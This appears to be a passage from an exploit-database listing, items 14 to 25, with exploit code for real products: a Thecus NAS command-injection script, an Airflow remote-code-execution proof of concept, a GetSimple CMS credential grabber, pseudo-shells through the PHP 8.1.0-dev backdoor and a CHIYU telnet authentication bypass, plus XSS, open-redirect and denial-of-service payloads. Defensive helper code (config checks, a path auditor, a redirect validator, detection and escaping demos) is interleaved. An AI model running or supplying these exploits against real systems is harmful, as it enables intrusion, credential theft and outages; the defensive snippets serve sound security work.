      pwn(server,username)
  14. # Exploit Title: Veyon 4.4.1 - 'VeyonService' Unquoted Service Path
      # Discovery by: Víctor García
      # Discovery Date: 2020-03-23
      # Vendor Homepage: https://veyon.io/
      # Software Link: https://github.com/veyon/veyon/releases/download/v4.4.1/veyon-4.4.1.0-win64-setup.exe
      # Tested Version: 4.4.1
      # Vulnerability Type: Unquoted Service Path
      # Tested on: Windows 10 Pro x64
      # CVE: CVE-2020-15261

      # Step to discover Unquoted Service Path:
      C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
      Veyon Service    VeyonService    C:\Program Files\Veyon\veyon-service.exe

      # Service info:
      C:\>sc qc VeyonService
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: VeyonService
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:\Program Files\Veyon\veyon-service.exe
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : Veyon Service
              DEPENDENCIES       : Tcpip
                                 : RpcSs
              SERVICE_START_NAME : LocalSystem

      # Exploit:
      # A successful attempt would require the local user to be able to insert their code in the
      # system root path undetected by the OS or other security applications where it could
      # potentially be executed during application startup or reboot. If successful, the local
      # user's code would execute with the elevated privileges of the application.
  15. # Exploit Title: Thecus N4800Eco Nas Server Control Panel - Command Injection
      # Date: 01/06/2021
      # Exploit Author: Metin Yunus Kandemir
      # Vendor Homepage: http://www.thecus.com/
      # Software Link: http://www.thecus.com/product.php?PROD_ID=83
      # Version: N4800Eco
      # Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection

      #!/usr/bin/python3
      import requests
      import sys
      import urllib3

      # To fix the SSL error that occurs when the script is started:
      # 1- Open the /etc/ssl/openssl.cnf file. At the bottom of the file:
      #    [system_default_sect]
      #    MinProtocol = TLSv1.2
      #    CipherString = DEFAULT@SECLEVEL=2
      # 2- Set the value of MinProtocol to TLSv1.0

      def readResult(s, target):
          d = {
              "fun": "setlog",
              "action": "query",
              "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
          }
          url = "http://" + target + "/adm/setmain.php"
          resultReq = s.post(url, data=d, verify=False)
          dict = resultReq.text.split()
          print("[+] Reading system log...\n")
          print(dict[5:8]) #change this range to read whole output of the command

      def delUser(s, target, command):
          d = {
              "action": "delete",
              "username": "$("+command+")"
          }
          url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
          delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
          if 'Local User remove succeeds' in delUserReq.text:
              print('[+] %s command was executed successfully' % command)
          else:
              print('[-] %s command was not executed!' %command)
              sys.exit(1)
          readResult(s, target)

      def addUser(s, target, command):
          d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
          url = "http://" + target + "/adm/setmain.php?fun=setbatch"
          addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
          if 'Users and groups were created successfully.' in addUserReq.text:
              print('[+] Users and groups were created successfully')
          else:
              print('[-] Users and groups were not created')
              sys.exit(1)
          delUser(s, target, command)

      def login(target, username, password, command=None):
          urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
          s = requests.Session()
          d = {
              "&eplang": "english",
              "p_pass": password,
              "p_user": username,
              "username": username,
              "pwd": password,
              "action": "login",
              "option": "com_extplorer"
          }
          url = "http://" + target + "/adm/login.php"
          loginReq = s.post(url, data=d, allow_redirects=False, verify=False)
          if '"success":true' in loginReq.text:
              print('[+] Authentication successful')
          elif '"success":false' in loginReq.text:
              print('[-] Authentication failed!')
              sys.exit(1)
          else:
              print('[-] Something went wrong!')
              sys.exit(1)
          addUser(s, target, command)

      def main(args):
          if len(args) != 5:
              print("usage: %s targetIp:port username password command" % (args[0]))
              print("Example 192.168.1.13:80 admin admin id")
              sys.exit(1)
          login(target=args[1], username=args[2], password=args[3], command=args[4])

      if __name__ == "__main__":
          main(args=sys.argv)
  16. # Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution
      # Date: 2021-06-02
      # Exploit Author: Pepe Berba
      # Vendor Homepage: https://airflow.apache.org/
      # Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html
      # Version: <= 1.10.10
      # Tested on: Docker apache/airflow:1.10.10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)
      # CVE : CVE-2020-11978
      #
      # This is a proof of concept for CVE-2020-11978, an RCE vulnerability in one of the example DAGs shipped with Airflow.
      # This combines with CVE-2020-13927, where unauthenticated requests to Airflow's Experimental API were allowed by default.
      # Together, they potentially allow unauthenticated RCE on Airflow.
      #
      # Repo: https://github.com/pberba/CVE-2020-11978
      # More information can be found here:
      # https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
      # https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
      #
      # Remediation:
      # For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.
      # For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete the example_trigger_target_dag DAG.
      #
      # Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"

      import argparse
      import requests
      import sys
      import time

      def create_dag(url, cmd):
          print('[+] Checking if Airflow Experimental REST API is accessible...')
          check = requests.get('{}/api/experimental/test'.format(url))
          if check.status_code == 200:
              print('[+] /api/experimental/test returned 200')
          else:
              print('[!] /api/experimental/test returned {}'.format(check.status_code))
              print('[!] Airflow Experimental REST API is not accessible')
              sys.exit(1)

          check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))
          if check_task.status_code != 200:
              print('[!] Failed to find the example_trigger_target_dag.bash_task')
              print('[!] Host isn\'t vulnerable to CVE-2020-11978')
              sys.exit(1)
          elif 'dag_run' in check_task.json()['env']:
              print('[!] example_trigger_target_dag.bash_task is patched')
              print('[!] Host isn\'t vulnerable to CVE-2020-11978')
              sys.exit(1)

          print('[+] example_trigger_target_dag.bash_task is vulnerable')

          unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))
          if unpause.status_code != 200:
              print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')
              sys.exit(1)
          else:
              print('[+] example_trigger_target_dag was enabled')

          print('[+] Creating new DAG...')
          res = requests.post(
              '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),
              json={
                  'conf': {
                      'message': '"; {} #'.format(cmd)
                  }
              }
          )
          if res.status_code == 200:
              print('[+] Successfully created DAG')
              print('[+] "{}"'.format(res.json()['message']))
          else:
              print('[!] Failed to create DAG')
              sys.exit(1)

          wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(
              url=url,
              execution_date=res.json()['execution_date']
          )

          start_time = time.time()
          print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')
          print('[.] If the bash task is never queued, then the scheduler might not be running.')
          while True:
              time.sleep(10)
              res = requests.get(wait_url)
              status = res.json()['state']
              if status == 'queued':
                  print('[.] Bash task queued...')
              elif status == 'running':
                  print('[+] Bash task running...')
              elif status == 'success':
                  print('[+] Bash task successfully ran')
                  break
              elif status == 'None':
                  print('[-] Bash task is not yet queued...')
              else:
                  print('[!] Bash task was {}'.format(status))
                  sys.exit(1)
          return 0

      def main():
          arg_parser = argparse.ArgumentParser()
          arg_parser.add_argument('url', type=str, help="Base URL for Airflow")
          arg_parser.add_argument('command', type=str)
          args = arg_parser.parse_args()
          create_dag(args.url, args.command)

      if __name__ == '__main__':
          main()
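The remediation lines in the post above name two settings; the following added check (not part of the post or of Airflow) parses an `airflow.cfg` fragment with `configparser` and reports which of the two CVE conditions still hold. Both config fragments are constructed; `airflow.api.auth.backend.default` is the permissive backend name from the 1.10 default config.

```python
import configparser
from typing import List

# Constructed airflow.cfg fragment mirroring the weak 1.10.10 defaults described in the post.
WEAK_CFG = """
[core]
load_examples = True

[api]
auth_backend = airflow.api.auth.backend.default
"""

# The same fragment with the post's remediation applied.
HARDENED_CFG = """
[core]
load_examples = False

[api]
auth_backend = airflow.api.auth.backend.deny_all
"""

PERMISSIVE_BACKEND = "airflow.api.auth.backend.default"


def airflow_findings(cfg_text: str) -> List[str]:
    """Return one finding per unresolved condition; an empty list means both CVEs are mitigated
    by configuration (upgrading to 1.10.11 also closes CVE-2020-11978)."""
    cfg = configparser.ConfigParser()
    cfg.read_string(cfg_text)
    findings = []

    # CVE-2020-13927: the experimental API must require authentication. Any backend other
    # than the permissive default counts as "has auth set"; a missing key means the default.
    backend = cfg.get("api", "auth_backend", fallback=PERMISSIVE_BACKEND).strip()
    if backend == PERMISSIVE_BACKEND:
        findings.append("CVE-2020-13927: [api] auth_backend allows unauthenticated API access")

    # CVE-2020-11978: example DAGs (including example_trigger_target_dag) must not be loaded.
    if cfg.getboolean("core", "load_examples", fallback=True):
        findings.append("CVE-2020-11978: [core] load_examples is True; example DAGs are loaded")

    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CFG), ("hardened", HARDENED_CFG)):
        print(label, airflow_findings(text) or ["no findings"])
```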
  17. # Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
      # Date 01.06.2021
      # Exploit Author: Ron Jost (Hacker5preme)
      # Vendor Homepage: http://get-simple.info/
      # Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
      # Version: 3.3.4
      # CVE: CVE-2014-8722
      # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit

      '''
      Description:
      GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
      (1) data/users/<username>.xml, (2) backups/users/<username>.xml.bak, (3) data/other/authorization.xml,
      or (4) data/other/appid.xml.
      '''

      '''
      Import required modules:
      '''
      import sys
      import requests

      '''
      User-Input:
      '''
      target_ip = sys.argv[1]
      target_port = sys.argv[2]
      cmspath = sys.argv[3]
      print('')
      username = input("Do you know the username? Y/N: ")
      if username == 'Y':
          print('')
          username = True
          username_string = input('Please enter the username: ')
      else:
          print('')
          username = False
          print('No problem, you will still get the API key')

      '''
      Get Api-Key:
      '''
      url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
      header = {
          "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
          "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
          "Accept-Encoding": "gzip, deflate",
          "Connection": "close",
          "Upgrade-Insecure-Requests": "1",
          "Cache-Control": "max-age=0"
      }
      x = requests.get(url, headers=header).text
      start = x.find('[') + 7
      end = x.find(']')
      api_key = x[start:end]
      print('')
      print('Information:')
      print('')
      print('[*] API Key: ' + api_key)

      if username:
          '''
          Get Email and Passwordhash (same headers as above):
          '''
          url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'
          x = requests.get(url, headers=header).text
          start = x[x.find('PWD>'):]
          passwordhash = start[start.find('>') + 1:start.find('<')]
          print('[*] Hashed Password: ' + passwordhash)
          start = x[x.find('EMAIL>'):]
          email = start[start.find('>') + 1:start.find('<')]
          print('[*] Email: ' + email)
          print('')
  18. # Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path
      # Date: 06-01-2021
      # Exploit Author: Geovanni Ruiz
      # Vendor Homepage: https://www.intel.com
      # Software Version: 01.00.1080.0
      # File Version: 1.00.1080.0
      # Tested on: Microsoft® Windows 10 Home Single Language 10.0.19042 x64 es
      # Vulnerability Type: Unquoted Service Path

      # 1. To find the unquoted service path vulnerability

      C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname

      DisplayName             Name               PathName                                                               StartMode  StartName
      Intel(R) Audio Service  IntelAudioService  C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe  Auto       LocalSystem

      # 2. To check service info:

      C:\>sc qc "IntelAudioService"
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: IntelAudioService
              TIPO                  : 10  WIN32_OWN_PROCESS
              TIPO_INICIO           : 2   AUTO_START
              CONTROL_ERROR         : 1   NORMAL
              NOMBRE_RUTA_BINARIO   : C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe
              GRUPO_ORDEN_CARGA     :
              ETIQUETA              : 0
              NOMBRE_MOSTRAR        : Intel(R) Audio Service
              DEPENDENCIAS          :
              NOMBRE_INICIO_SERVICIO: LocalSystem

      # 3. Exploit:
      To exploit this vulnerability an attacker needs to drop a malicious executable into the service path undetected by the OS in order to gain SYSTEM privileges.
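Posts 14 and 18 both rest on the same configuration defect: an auto-start service whose BINARY_PATH_NAME is unquoted and contains spaces. The added audit below (not part of either post) takes service records as shown in their wmic/sc output, flags the affected ones, and produces the quoted path an administrator would set; the service list is constructed from the two posts plus control cases.

```python
import re
from typing import List, Sequence, Tuple

# Constructed sample modelled on the wmic/sc output in the Veyon and Intel Audio posts.
# Each entry is (service name, BINARY_PATH_NAME, StartMode).
SAMPLE_SERVICES: Sequence[Tuple[str, str, str]] = (
    ("VeyonService", r"C:\Program Files\Veyon\veyon-service.exe", "Auto"),
    ("IntelAudioService", r"C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe", "Auto"),
    ("QuotedSvc", r'"C:\Program Files\Vendor\svc.exe" -run', "Auto"),  # quoted: not affected
    ("NoSpaceSvc", r"C:\Tools\svc.exe", "Auto"),                         # no space: not affected
    ("ManualSvc", r"C:\Program Files\Vendor\manual.exe", "Manual"),     # not auto-start: not reported
)

# Executable part of an unquoted path: everything up to the first ".exe", then optional arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def is_unquoted_with_spaces(path_name: str) -> bool:
    """True when the path is not quoted and the executable path contains a space: the
    ambiguity CreateProcess resolves by trying each space-delimited prefix in turn."""
    p = path_name.strip()
    if p.startswith('"'):
        return False
    m = _EXE_RE.match(p)
    exe = m.group(1) if m else p
    return " " in exe


def quoted_path(path_name: str) -> str:
    """Remediated BINARY_PATH_NAME: the executable wrapped in quotes, arguments preserved."""
    p = path_name.strip()
    if p.startswith('"'):
        return p
    m = _EXE_RE.match(p)
    if not m:
        return '"%s"' % p
    exe, args = m.group(1), m.group(2) or ""
    return '"%s"%s' % (exe, args)


def audit(services: Sequence[Tuple[str, str, str]]) -> List[str]:
    """Names of auto-start services with an unquoted, space-containing binary path."""
    return [name for name, path, start in services
            if start.lower() == "auto" and is_unquoted_with_spaces(path)]


if __name__ == "__main__":
    for name, path, start in SAMPLE_SERVICES:
        if name in audit(SAMPLE_SERVICES):
            print("%-18s %s" % (name, quoted_path(path)))
```

The quoted form is what goes into `sc config <name> binPath= "\"C:\...\service.exe\""` on the host; the inner quotes must survive the shell.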
  19. # Exploit Title: Products.PluggableAuthService 2.6.0 - Open Redirect
      # Exploit Author: Piyush Patil
      # Affected Component: Pluggable Zope authentication/authorization framework
      # Component Link: https://pypi.org/project/Products.PluggableAuthService/
      # Version: < 2.6.1
      # CVE: CVE-2021-21337
      # Reference: https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr

      --------------------------Proof of Concept-----------------------
      1- Go to https://localhost/login
      2- Turn on intercept and click on the login
      3- Change "came_from" parameter value to https://attacker.com
      4- User will be redirected to an attacker-controlled website.

      Fix:
      pip install "Products.PluggableAuthService>=2.6.1"
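The fix for this class of bug is to treat `came_from` as untrusted and only honour it when it points back at the application. The validator below is an added illustration of that check (a hypothetical helper, not the fix shipped in Products.PluggableAuthService 2.6.1); the allowed host list is an assumption supplied by the caller.

```python
from typing import Iterable
from urllib.parse import urlsplit, urlunsplit


def safe_came_from(came_from: str, allowed_hosts: Iterable[str], default: str = "/") -> str:
    """Return came_from only when it stays on this site; otherwise return the default path.

    Accepts site-relative paths ("/manage_main") and absolute URLs whose host is in
    allowed_hosts (the host part is reduced to a relative path so the scheme cannot be
    downgraded). Rejects protocol-relative targets ("//attacker.com"), non-http schemes
    ("javascript:"), and backslash variants ("/\\attacker.com") that browsers normalise.
    """
    if not came_from:
        return default
    candidate = came_from.strip().replace("\\", "/")
    parts = urlsplit(candidate)

    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return default

    if parts.netloc:
        allowed = {h.lower() for h in allowed_hosts}
        if parts.netloc.lower() not in allowed:
            return default
        return urlunsplit(("", "", parts.path or "/", parts.query, parts.fragment))

    # No host: must be an absolute path on this origin, and not "//host" in disguise.
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    hosts = ["localhost"]
    for value in ("https://attacker.com", "/manage_main", "//attacker.com/x",
                  "https://localhost/login?next=1", "javascript:alert(1)", "/\\attacker.com"):
        print("%-32r -> %r" % (value, safe_came_from(value, hosts)))
```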
  20. # Exploit Title: Seo Panel 4.8.0 - 'search_name' Reflected XSS
      # Date: 21-03-2021
      # Exploit Author: Piyush Patil
      # Vendor Homepage: https://www.seopanel.org/
      # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
      # Version: Seo Panel 4.8.0
      # Tested on: Windows 10 and Kali
      # CVE : CVE-2021-28417

      -Description:
      A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.

      -Payload used:
      x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22

      -Steps to reproduce:
      1- Log in to SEO admin panel
      2- Add below line at the end:
      http://localhost/archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=http%3a%2f%2fwww.example.com
      3- Hover your mouse near to "CTR" field
  21. # Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
      # Date: 23 may 2021
      # Exploit Author: flast101
      # Vendor Homepage: https://www.php.net/
      # Software Link:
      # - https://hub.docker.com/r/phpdaily/php
      # - https://github.com/phpdaily/php
      # Version: 8.1.0-dev
      # Tested on: Ubuntu 20.04
      # References:
      # - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
      # - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

      """
      Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
      Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
      Contact: [email protected]

      An early release of PHP, the PHP 8.1.0-dev version, was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed.
      If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
      The following exploit uses the backdoor to provide a pseudo shell on the host.
      """

      #!/usr/bin/env python3
      import os
      import re
      import requests

      host = input("Enter the full host url:\n")
      request = requests.Session()
      response = request.get(host)

      if str(response) == '<Response [200]>':
          print("\nInteractive shell is opened on", host, "\nCan't access tty; job control turned off.")
          try:
              while 1:
                  cmd = input("$ ")
                  headers = {
                      "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
                      "User-Agentt": "zerodiumsystem('" + cmd + "');"
                  }
                  response = request.get(host, headers=headers, allow_redirects=False)
                  current_page = response.text
                  stdout = current_page.split('<!DOCTYPE html>', 1)
                  print(stdout[0])
          except KeyboardInterrupt:
              print("Exiting...")
              exit()
      else:
          print("\r")
          print(response)
          print("Host is not available, aborting...")
          exit()
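The trigger described above is cheap to spot at a proxy or in captured traffic: a request carrying the misspelled `User-Agentt` header, and in particular one whose value begins with the `zerodium` marker the backdoored build keyed on. The detection below is an added example (not from the post); the request samples are constructed.

```python
from typing import List, Tuple

# Constructed raw request header blocks: one benign, two carrying the backdoor trigger header.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: app.internal\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: app.internal\r\nUser-Agent: Mozilla/5.0\r\n"
    "User-Agentt: zerodiumsystem('id');\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: app.internal\r\nuser-agentt: zerodiumphpinfo();\r\n\r\n",
]

TRIGGER_MARKER = "zerodium"  # the string the backdoored User-Agentt handler searched for


def parse_headers(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw request into its request line and (lower-cased name, value) header pairs."""
    lines = raw.split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def backdoor_indicators(raw: str) -> List[str]:
    """Findings for one request. The non-standard header name alone is worth an alert
    (nothing legitimate sends it); the marker in its value is the high-confidence signal."""
    _, headers = parse_headers(raw)
    findings = []
    for name, value in headers:  # header names are case-insensitive, hence the lower-casing
        if name == "user-agentt":
            findings.append("non-standard header User-Agentt present")
            if TRIGGER_MARKER in value:
                findings.append("PHP 8.1.0-dev backdoor trigger in User-Agentt: " + value)
    return findings


def flagged_indices(requests_raw: List[str]) -> List[int]:
    """Indices of requests that produced at least one finding."""
    return [i for i, raw in enumerate(requests_raw) if backdoor_indicators(raw)]


if __name__ == "__main__":
    for i in flagged_indices(SAMPLE_REQUESTS):
        print(i, parse_headers(SAMPLE_REQUESTS[i])[0], backdoor_indicators(SAMPLE_REQUESTS[i]))
```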
  22. # Exploit Title: Seo Panel 4.8.0 - 'category' Reflected XSS
      # Date: 22-03-2021
      # Exploit Author: Piyush Patil
      # Vendor Homepage: https://www.seopanel.org/
      # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
      # Version: Seo Panel 4.8.0
      # Tested on: Windows 10 and Kali
      # CVE : CVE-2021-28418

      -Description:
      A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.

      -Payload used:
      x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22

      -Steps to reproduce:
      1- Log in to SEO admin panel
      2- Visit:
      http://localhost/settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
      3- Hover your mouse to "Cancel" field
  23. # Exploit Title: Seo Panel 4.8.0 - 'from_time' Reflected XSS
      # Date: 23-03-2021
      # Exploit Author: Piyush Patil
      # Vendor Homepage: https://www.seopanel.org/
      # Version: Seo Panel 4.8.0
      # Tested on: Windows 10 and Kali
      # CVE : CVE-2021-28420

      -Description:
      A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote attackers to inject JavaScript via alerts.php and the "from_time" parameter.

      -Payload used:
      x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22

      -Steps to reproduce:
      1- Log in to SEO admin panel
      2- Visit:
      http://localhost/alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11
      3- Hover your mouse to "Period" field
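Posts 20, 22 and 23 all reuse one payload that works by closing an attribute value with `"` and adding an `onmouseover` handler. The added example below (not from the posts or from Seo Panel) renders the same input the vulnerable way and the attribute-escaped way, then uses Python's `html.parser` to show which attributes a tokenizer actually sees in each; the rendered `<input>` template is an assumption standing in for the panel's own form markup.

```python
import html
from html.parser import HTMLParser
from typing import List

# The payload from the three Seo Panel posts, URL-decoded (constructed from the page's own value).
PAYLOAD = 'x" onmouseover=alert(document.cookie) x="'


def render_input_unsafe(name: str, value: str) -> str:
    """The vulnerable pattern: a request parameter echoed straight into an attribute value."""
    return '<input type="text" name="%s" value="%s">' % (name, value)


def render_input_safe(name: str, value: str) -> str:
    """The fix: escape for the attribute context (quote=True turns '"' into '&quot;'),
    so the injected text can no longer close the attribute and start a new one."""
    return '<input type="text" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


class _AttrCollector(HTMLParser):
    """Collects the attribute names the tokenizer assigns to each start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attr_names: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.attr_names.extend(name for name, _ in attrs)


def event_handler_attrs(markup: str) -> List[str]:
    """on* attribute names actually parsed from the markup; empty means no handler was injected."""
    p = _AttrCollector()
    p.feed(markup)
    p.close()
    return [a for a in p.attr_names if a.lower().startswith("on")]


if __name__ == "__main__":
    for render in (render_input_unsafe, render_input_safe):
        markup = render("search_name", PAYLOAD)
        print(render.__name__, event_handler_attrs(markup), markup)
```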
  24. # Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
      # Date: 01/06/2021
      # Exploit Author: sirpedrotavares
      # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
      # Software Link: https://www.chiyu-tech.com/category-hardware.html
      # Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021
      # Tested on: BF-430, BF-431, BF-450M, and SEMAC
      # CVE: CVE-2021-31251
      # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

      """
      Description:
      Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process
      due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed
      request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are
      vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions.

      CVE ID: CVE-2021-31251
      CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
      URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
      """

      #!/usr/bin/env python3
      # usage: python3 exploit.py IP
      import socket
      import time
      import sys

      HOST = sys.argv[1]
      PORT = 23
      socket.setdefaulttimeout(10)
      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

      try:
          connect = s.connect_ex((HOST, PORT))
          try:
              print("[+] Try to connect...\n")
              time.sleep(1)
              s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
              s.recv(1024).strip()
              s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
              s.recv(1024).strip()
              s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
              result = s.recv(1024).strip()
              if result != b'\xff\xfe\x01':
                  s.send(b"\x09")
                  result = s.recv(1024).strip()
              if connect == 0 and "sername" not in str(result):
                  if b"\xff\xfe\x01" == result:
                      print("Connected! ;)\ntype: \"help\"\n\n")
                      while 1:
                          cmd = input("(CHIYU pwnShell:) $ ")
                          body = cmd + "\n"
                          s.send(body.encode('utf-8', 'ignore'))
                          result = s.recv(1024).decode('utf8', 'ignore')
                          if not len(result):
                              print("[+] CHIYU device not available, try again ... (terminating)")
                              s.close()
                              break
                          print(result.strip('CMD>'))
                          b = "\n"
                          s.send(b.encode('utf-8', 'ignore'))
                          result = s.recv(1024).decode()
                          print(result.strip('CMD>'))
          except KeyboardInterrupt:
              print("\n[+] ^C Received, closing connection")
              s.close()
          except EOFError:
              print("\n[+] ^D Received, closing connection")
              s.close()
      except socket.error:
          print("[+] Unable to connect to CHIYU device.")
  25. # Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
      # Date: 01/06/2021
      # Exploit Author: sirpedrotavares
      # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
      # Software Link: https://www.chiyu-tech.com/category-hardware.html
      # Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021
      # Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
      # CVE: CVE-2021-31642
      # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

      Description:
      A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE,
      Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page
      parameter that will crash the web portal, making it unavailable until a reboot of the device.

      CVE ID: CVE-2021-31642
      CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
      URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642

      Affected parameter: page=
      Component: if.cgi
      Payload: if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000

      ====HTTP request======
      GET /if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 HTTP/1.1
      Host: 127.0.0.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
      Accept-Encoding: gzip, deflate
      Authorization: Basic YWRtaW46YWRtaW4=
      Connection: close
      Referer: http://127.0.0.1/AccLog.htm
      Cookie: fresh=
      Upgrade-Insecure-Requests: 1

      Steps to reproduce:
      1. Navigate to the vulnerable device
      2. Make a GET request to the CGI component (if.cgi)
      3. Append the payload at the end of the vulnerable parameter (page)
      4. Submit the request and observe payload execution

      Mitigation:
